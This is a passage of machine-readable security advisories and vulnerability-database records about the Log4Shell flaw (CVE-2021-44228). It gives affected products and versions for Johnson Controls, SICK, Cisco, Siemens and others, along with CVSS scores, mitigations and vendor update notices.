"initial_release_date": "2021-12-23T00:00:00.000000Z",
"revision_history": [
{
"date": "2021-12-23T00:00:00.000000Z",
"legacy_version": "Initial",
"number": "1",
"summary": "Publication Date"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c= 21.12",
"product": {
"name": "Exacq Enterprise Manager: All Versions 21.12 and prior",
"product_id": "CSAFPID-0001"
}
}
],
"category": "product_name",
"name": "Exacq Enterprise Manager"
}
],
"category": "vendor",
"name": "Exacq Technologies, Johnson Controls Inc."
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "summary",
"text": "An attacker could enter malicious data into the affected product, causing remote code execution.CVE-2021-44228 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).",
"title": "Vulnerability Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "web.nvd.nist.gov",
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44228"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
}
],
"remediations": [
{
"category": "mitigation",
"details": "Johnson Controls recommends upgrading exacq Enterprise Manager to Version 21.12.1 or apply manual mitigation steps (available upon request).",
"product_ids": [
"CSAFPID-0001"
],
"url": "https://exacq.com/support/downloads.php?section=esm"
},
{
"category": "mitigation",
"details": "Refer to the exacq Hardening Guide for guidance on isolating exacqVision NVRs and Enterprise Manager from public facing networks to reduce network exposure to attacks.",
"product_ids": [
"CSAFPID-0001"
],
"url": "https://www.johnsoncontrols.com/cyber-solutions/cyber-learning"
},
{
"category": "mitigation",
"details": "For more detailed mitigation instructions, please see Johnson Controls Product Security Advisory JCI-PSA-2021-24 v1",
"product_ids": [
"CSAFPID-0001"
],
"url": "https://www.johnsoncontrols.com/-/media/jci/cyber-solutions/product-security-advisories/2021/jci-psa-2021-24_exacqvision-em.pdf"
},
{
"category": "mitigation",
"details": "Further ICS security notices and product security guidance are located at Johnson Controls product security website.",
"product_ids": [
"CSAFPID-0001"
],
"url": "https://www.johnsoncontrols.com/cyber-solutions/security-advisories"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
"products": [
"CSAFPID-0001"
]
}
]
}
]
}
icsa-22-034-01
Vulnerability from csaf_cisa
Published
2022-02-03 00:00
Modified
2022-03-08 00:00
Summary
Sensormatic PowerManage (Update A)
Notes
CISA Disclaimer
This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov
Legal Notice
All information products included in https://us-cert.cisa.gov/ics are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.
Risk evaluation
Successful exploitation of this vulnerability could allow an attacker to gain remote code execution.
Critical infrastructure sectors
Critical Manufacturing
Countries/areas deployed
Worldwide
Company headquarters location
Ireland
Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:
Recommended Practices
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
Recommended Practices
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on cisa.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.
Exploitability
No known public exploits specifically target this vulnerability.
{
"document": {
"acknowledgments": [
{
"organization": "Johnson Controls, Inc",
"summary": "reporting this vulnerability to CISA"
}
],
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Disclosure is not limited",
"tlp": {
"label": "WHITE",
"url": "https://us-cert.cisa.gov/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov",
"title": "CISA Disclaimer"
},
{
"category": "legal_disclaimer",
"text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.",
"title": "Legal Notice"
},
{
"category": "summary",
"text": "Successful exploitation of this vulnerability could allow an attacker to gain remote code execution.",
"title": "Risk evaluation"
},
{
"category": "other",
"text": "Critical Manufacturing",
"title": "Critical infrastructure sectors"
},
{
"category": "other",
"text": "Worldwide",
"title": "Countries/areas deployed"
},
{
"category": "other",
"text": "Ireland",
"title": "Company headquarters location"
},
{
"category": "general",
"text": "CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\nCISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on cisa.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.",
"title": "Recommended Practices"
},
{
"category": "other",
"text": "No known public exploits specifically target this vulnerability.",
"title": "Exploitability"
}
],
"publisher": {
"category": "coordinator",
"contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870",
"name": "CISA",
"namespace": "https://www.cisa.gov/"
},
"references": [
{
"category": "self",
"summary": "ICS Advisory ICSA-22-034-01 JSON",
"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2022/icsa-22-034-01.json"
},
{
"category": "self",
"summary": "ICS Advisory ICSA-22-034-01 Web Version",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-034-01"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B"
}
],
"title": "Sensormatic PowerManage (Update A)",
"tracking": {
"current_release_date": "2022-03-08T00:00:00.000000Z",
"generator": {
"engine": {
"name": "CISA CSAF Generator",
"version": "1.0.0"
}
},
"id": "ICSA-22-034-01",
"initial_release_date": "2022-02-03T00:00:00.000000Z",
"revision_history": [
{
"date": "2022-02-03T00:00:00.000000Z",
"legacy_version": "Initial",
"number": "1",
"summary": "ICSA-22-034-01 Sensormatic PowerManage"
},
{
"date": "2022-03-08T00:00:00.000000Z",
"legacy_version": "A",
"number": "2",
"summary": "ICSA-22-034-01 Sensormatic PowerManage (Update A)"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003e= 4.0 | \u003c= 4.8",
"product": {
"name": "PowerManage: Versions 4.0 to 4.8",
"product_id": "CSAFPID-0001"
}
}
],
"category": "product_name",
"name": "PowerManage"
}
],
"category": "vendor",
"name": "Sensormatic Electronics, LLC, Johnson Controls Inc."
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "summary",
"text": "The affected product does not properly validate user input, allowing an attacker to enter malicious input and potentially gain remote code execution.CVE-2021-44228 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).",
"title": "Vulnerability Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "web.nvd.nist.gov",
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44228"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Upgrade PowerManage to Version 4.10",
"product_ids": [
"CSAFPID-0001"
],
"url": "https://www.johnsoncontrols.com/cyber-solutions/security-advisories"
},
{
"category": "mitigation",
"details": "For more detailed mitigation instructions, please see Johnson Controls Product Security Advisory JCI-PSA-2022-01 v1",
"product_ids": [
"CSAFPID-0001"
],
"url": "https://www.johnsoncontrols.com/cyber-solutions/security-advisories"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
"products": [
"CSAFPID-0001"
]
}
]
}
]
}
sca-2021-0003
Vulnerability from csaf_sick
Published
2021-12-14 17:00
Modified
2021-12-17 12:00
Summary
SICK Security Advisory for Apache Log4j (CVE-2021-44228)
Notes
General Security Measures
As general security measures, SICK recommends to minimize network exposure of the devices, restrict network access and follow recommended security practices in order to run the devices in a protected IT environment.
Vulnerability Classification
SICK performs vulnerability classification by using the CVSS scoring system (*CVSS v3.1*). The environmental score is dependent on the customer’s environment and can affect the overall CVSS score. SICK recommends that customers individually evaluate the environmental score to achieve final scoring.
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "As general security measures, SICK recommends to minimize network exposure of the devices, restrict network access and follow recommended security practices in order to run the devices in a protected IT environment.",
"title": "General Security Measures"
},
{
"category": "general",
"text": "SICK performs vulnerability classification by using the CVSS scoring system (*CVSS v3.1*). The environmental score is dependent on the customer\u2019s environment and can affect the overall CVSS score. SICK recommends that customers individually evaluate the environmental score to achieve final scoring.",
"title": "Vulnerability Classification"
}
],
"publisher": {
"category": "vendor",
"contact_details": "psirt@sick.de",
"issuing_authority": "SICK PSIRT is responsible for any vulnerabilities related to SICK products.",
"name": "SICK PSIRT",
"namespace": "https://sick.com/psirt"
},
"references": [
{
"summary": "SICK PSIRT Security Advisories",
"url": "https://sick.com/psirt"
},
{
"summary": "SICK Operating Guidelines",
"url": "https://cdn.sick.com/media/docs/1/11/411/Special_information_CYBERSECURITY_BY_SICK_en_IM0084411.PDF"
},
{
"summary": "ICS-CERT recommended practices on Industrial Security",
"url": "http://ics-cert.us-cert.gov/content/recommended-practices"
},
{
"summary": "CVSS v3.1 Calculator",
"url": "https://www.first.org/cvss/calculator/3.1"
},
{
"category": "self",
"summary": "The canonical URL.",
"url": "https://www.sick.com/.well-known/csaf/white/2021/sca-2021-0003.json"
}
],
"title": "SICK Security Advisory for Apache Log4j (CVE-2021-44228)",
"tracking": {
"aliases": [
"LOG4SHELL"
],
"current_release_date": "2021-12-17T12:00:00.000Z",
"generator": {
"date": "2023-02-10T07:41:23.369Z",
"engine": {
"name": "Secvisogram",
"version": "2.0.0"
}
},
"id": "SCA-2021-0003",
"initial_release_date": "2021-12-14T17:00:00.000Z",
"revision_history": [
{
"date": "2021-12-14T17:00:00.000Z",
"number": "1",
"summary": "Initial Release"
},
{
"date": "2021-12-16T17:00:00.000Z",
"number": "2",
"summary": "Updated affected products"
},
{
"date": "2021-12-17T12:00:00.000Z",
"number": "3",
"summary": "Updated affected versions"
},
{
"date": "2022-01-14T13:00:00.000Z",
"number": "4",
"summary": "Updated affected products"
},
{
"date": "2022-01-19T11:00:00.000Z",
"number": "5",
"summary": "Updated affected products"
},
{
"date": "2022-02-17T11:00:00.000Z",
"number": "6",
"summary": "Updated affected products"
},
{
"date": "2023-02-10T11:00:00.000Z",
"number": "7",
"summary": "Updated Advisory (only visual changes)"
}
],
"status": "final",
"version": "7"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c1.5.3",
"product": {
"name": "SICK FieldEcho \u003c1.5.3",
"product_id": "CSAFPID-0001",
"product_identification_helper": {
"skus": [
"1612993"
],
"x_generic_uris": [
{
"namespace": "SICK:Website",
"uri": "SICK:Website:https://www.sick.com/de/de/p/p597264"
}
]
}
}
}
],
"category": "product_name",
"name": "FieldEcho"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c1.4.1",
"product": {
"name": "SICK Function Block Factory \u003c1.4.1",
"product_id": "CSAFPID-0002",
"product_identification_helper": {
"x_generic_uris": [
{
"namespace": "SICK:Website",
"uri": "SICK:Website:https://www.sick.com/de/de/p/p653518"
}
]
}
}
}
],
"category": "product_name",
"name": "Function Block Factory"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c1.5.0",
"product": {
"name": "SICK AppManager \u003c1.5.0",
"product_id": "CSAFPID-0003",
"product_identification_helper": {
"x_generic_uris": [
{
"namespace": "SICK:Website",
"uri": "SICK:Website:https://www.sick.com/de/de/p/p532784"
}
]
}
}
}
],
"category": "product_name",
"name": "AppManager"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c1.2.2",
"product": {
"name": "SICK FieldEcho Dashboard \u003c1.2.2",
"product_id": "CSAFPID-0004",
"product_identification_helper": {
"x_generic_uris": [
{
"namespace": "SICK:Website",
"uri": "SICK:Website:https://www.sick.com/de/de/p/p651603"
}
]
}
}
}
],
"category": "product_name",
"name": "FieldEcho Dashboard"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c3.6.0",
"product": {
"name": "SICK AppStudio \u003c3.6.0",
"product_id": "CSAFPID-0005",
"product_identification_helper": {
"skus": [
"1610199"
],
"x_generic_uris": [
{
"namespace": "SICK:Website",
"uri": "SICK:Website:https://www.sick.com/de/de/p/p448644"
}
]
}
}
}
],
"category": "product_name",
"name": "AppStudio"
}
],
"category": "vendor",
"name": "SICK AG"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"notes": [
{
"category": "summary",
"text": "A critical remote code execution vulnerability impacting at least Apache Log4j 2 (versions 2.0 to 2.14.1) was recently announced by Apache. This vulnerability is designated by Mitre as CVE-2021-44228 with the highest severity rating of 10.0. The vulnerability is also known as Log4Shell by security \nresearchers. If exploited, this vulnerability allows adversaries to potentially take full control of the impacted system.\nLog4j 2 is a commonly used open source third party Java logging library used in software applications and services.",
"title": "Summary"
}
],
"product_status": {
"fixed": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005"
]
},
"references": [
{
"category": "external",
"summary": "Apache Security Advisory",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "CVE Entry",
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Fixed on vendorside",
"product_ids": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004"
]
}
]
}
]
}
var-202112-0566
Vulnerability from variot
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. JIRA issues fixed (https://issues.jboss.org/):
LOG-1971 - Applying cluster state is causing elasticsearch to hit an issue and become unusable
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Critical: Red Hat AMQ Streams 1.6.5 release and security update Advisory ID: RHSA-2021:5133-01 Product: Red Hat JBoss AMQ Advisory URL: https://access.redhat.com/errata/RHSA-2021:5133 Issue date: 2021-12-14 CVE Names: CVE-2021-44228 ==================================================================== 1. Summary:
Red Hat AMQ Streams 1.6.5 is now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency.
This release of Red Hat AMQ Streams 1.6.5 serves as a replacement for Red Hat AMQ Streams 1.6.4, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.
Security Fix(es):
- log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link (you must log in to download the update).
- Bugs fixed (https://bugzilla.redhat.com/):
2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
- References:
https://access.redhat.com/security/cve/CVE-2021-44228 https://access.redhat.com/security/updates/classification/#critical https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.streams&version=1.6.5 https://access.redhat.com/security/vulnerabilities/RHSB-2021-009
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYblJBNzjgjWX9erEAQgrQQ//cpcYDzrhPXM4+U+DMgmqnuVhobliJIZt dwIgEyX3jYfLfXZgzkDCnHdwUjJsVub12ielI3JkHsOnGU8faFmp1kEKBvub0Xdh EhjmyDGVSTvdcQyCn9+1z8BDddxLM8UjUBrqF6FrLe6OJcrZi5ICOlZB9sBJ9TKj s4HH3NWW/PSUM96X20TZXl2ah9rkWy+MBoa+jxhOX5Fzyil2Dhcv2LNPA8SfVIme hqN+pSCiQ4Ik1FKJ2wPUItPtTGdQQKVIVhh/RHvGQrIqNWFXWCQkyq4R2Ho2+Eip b5+XW/X0Mt5AkJo5Lz8TZEIjPSeILOy6ucf3fOVDSDUIA2wtdmBA/QV8XvNPtRzy zIUMMdKmuKfR6IF2N+05G6sJ0BWisMmz8hYVD/nBh4FF9HmUGP8wBaLrBMDpGhPE Qu59Ysh0/cdtCGY0O75QSa6RbDn6WyE56groY0i0JSSzrlA94ygSuNJ71nG5wz5I 9TdZqceCDDmR9/FsFgvtzNRaJXqq92/fJdHwTJ/qToutYRsBgEYPmCpNqMXBz59W oXs+VKtt2muYCe9WNDRO/1l9WAs6SO8FekvxcEripg8s1gofkvB4Xa7VkSkbrROZ qCyI4Rz1JSYX287LsQ+Z5E7f4ZchsAIggxOw6ovrnuXbT+rS4IVpwu6Os2AOYQHo 9Sch0c3lbGw=Ervs -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. ========================================================================= Ubuntu Security Notice USN-5192-2 December 17, 2021
apache-log4j2 vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 ESM
Summary:
Apache Log4j 2 could be made to crash or run programs as an administrator if it received a specially crafted input. This update provides the corresponding update for Ubuntu 16.04 ESM.
Original advisory details:
Chen Zhaojun discovered that Apache Log4j 2 allows remote attackers to run programs via a special crafted input. An attacker could use this vulnerability to cause a denial of service or possibly execute arbitrary code.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 ESM: liblog4j2-java 2.4-2ubuntu0.1~esm1
In general, a standard system update will make all the necessary changes. The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Installation instructions are available from the Fuse product documentation pages:
Fuse 7.8: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch https://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications
Fuse 7.9: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications
Fuse 7.10: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications
VMware Unified Access Gateway VMware Carbon Black Workload Appliance VMware Site Recovery Manager, vSphere Replication VMware Tanzu GemFire VMware Tanzu GemFire for VMs VMware Tanzu Operations Manager VMware Tanzu Application Service for VMs VMware Horizon Agents Installer
You are receiving this alert because you are subscribed to the VMware Security Announcements mailing list. To modify your subscription or unsubscribe please visit https://lists.vmware.com/mailman/listinfo/security-announce
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202112-0566",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prime service catalog",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "12.1"
},
{
"model": "unified intelligence center",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(2\\)"
},
{
"model": "vesys",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2019.1"
},
{
"model": "firepower threat defense",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.5.0"
},
{
"model": "spectrum power 7",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.30"
},
{
"model": "paging server",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.5\\(1\\)"
},
{
"model": "network services orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "5.5.4.1"
},
{
"model": "packaged contact center enterprise",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "11.6"
},
{
"model": "crosswork data gateway",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0.2"
},
{
"model": "network services orchestrator",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "5.5"
},
{
"model": "ucs director",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "6.8.2.0"
},
{
"model": "crosswork optimization engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.0.0"
},
{
"model": "unified contact center enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.6\\(2\\)"
},
{
"model": "evolved programmable network manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0"
},
{
"model": "webex meetings server",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "3.0"
},
{
"model": "xpedition enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": null
},
{
"model": "wan automation engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2.3"
},
{
"model": "log4j",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.12.2"
},
{
"model": "video surveillance manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.14\\(3.025\\)"
},
{
"model": "optical network controller",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0"
},
{
"model": "system debugger",
"scope": "eq",
"trust": 1.0,
"vendor": "intel",
"version": null
},
{
"model": "unified workforce optimization",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)"
},
{
"model": "common services platform collector",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.009\\(000.001\\)"
},
{
"model": "network dashboard fabric controller",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.3\\(1\\)"
},
{
"model": "siveillance vantage",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "sd-wan vmanage",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "20.6"
},
{
"model": "network services orchestrator",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "5.6"
},
{
"model": "evolved programmable network manager",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1.1"
},
{
"model": "unified contact center enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5\\(1\\)"
},
{
"model": "crosswork zero touch provisioning",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.0.0"
},
{
"model": "emergency responder",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(4.65000.14\\)"
},
{
"model": "unified contact center express",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5\\(1\\)"
},
{
"model": "dna center",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "2.2.2.0"
},
{
"model": "crosswork network automation",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "fxos",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.3.0"
},
{
"model": "cloudcenter suite",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "5.4\\(1\\)"
},
{
"model": "unified customer voice portal",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.6\\(1\\)"
},
{
"model": "unified communications manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1.18900.97\\)"
},
{
"model": "data center network manager",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "11.3\\(1\\)"
},
{
"model": "emergency responder",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(4.66000.14\\)"
},
{
"model": "smart phy",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1.5"
},
{
"model": "customer experience cloud agent",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
